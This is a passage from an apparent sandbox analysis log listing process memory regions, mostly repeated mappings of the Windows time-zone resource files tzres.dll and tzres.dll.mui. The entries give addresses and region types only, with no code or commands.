(normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3198 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3199 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3200 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3201 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3202 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3203 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3204 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3205 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3206 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3207 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3208 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3209 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3210 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3211 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3212 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3213 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3214 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3215 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3216 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3217 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3218 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3220 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3221 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3222 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3223 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3224 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3225 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3226 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3227 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3228 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3229 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3230 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3231 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3232 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3233 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3234 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3236 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3237 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3238 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3239 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3240 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3241 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3242 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3243 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3244 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3245 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3247 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3248 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3249 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3250 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3251 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3252 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3253 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3254 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3255 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3256 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3257 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3258 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3259 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3260 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3261 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3262 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3263 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3264 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3265 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3266 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3267 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3268 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3269 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3270 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3271 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3272 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3273 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3274 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3276 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3277 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3278 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3279 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3280 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3281 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3282 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3283 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3284 start_va = 0xa90000 end_va = 0xa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3285 start_va = 0xb20000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3287 start_va = 0xa90000 end_va = 0xa95fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 3288 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3289 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3290 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3291 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3292 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3293 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3294 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3295 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3296 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3297 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3298 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3299 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3300 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3301 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3303 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3304 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3305 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3306 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3307 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3308 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3309 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3310 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3311 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3312 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3313 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3314 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3396 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3397 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3398 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3399 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3400 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3401 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3402 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3403 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3404 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3405 start_va = 0xb30000 end_va = 0xb36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3406 start_va = 0xb20000 end_va = 0xb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 